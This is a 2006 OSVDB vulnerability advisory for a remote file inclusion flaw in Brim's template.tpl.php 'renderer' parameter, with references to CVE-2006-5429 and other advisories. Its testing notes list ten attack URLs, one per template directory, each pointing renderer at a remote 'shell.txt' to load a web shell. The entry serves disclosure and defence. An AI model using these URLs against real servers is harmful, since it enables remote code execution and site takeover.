Brim Multiple /templates/ Directory template.tpl.php renderer Variable Remote File Inclusion

2006-10-17T09:48:54
ID OSVDB:29764
Type osvdb
Reporter OSVDB
Modified 2006-10-17T09:48:54

Description

Manual Testing Notes

http://[target]/[path]/templates/barrel/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/sidebar/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/text-only/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/slashdot/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/penguin/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/pda/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/oerdec/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/nifty/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/mylook/template.tpl.php?renderer=http://shell.txt? http://[target]/[path]/templates/barry/template.tpl.php?renderer=http://shell.txt?

References:

Vendor URL: http://sourceforge.net/projects/brim Secunia Advisory ID:22465 ISS X-Force ID: 29647 Generic Exploit URL: http://milw0rm.com/exploits/2589 FrSIRT Advisory: ADV-2006-4086 CVE-2006-5429 Bugtraq ID: 20594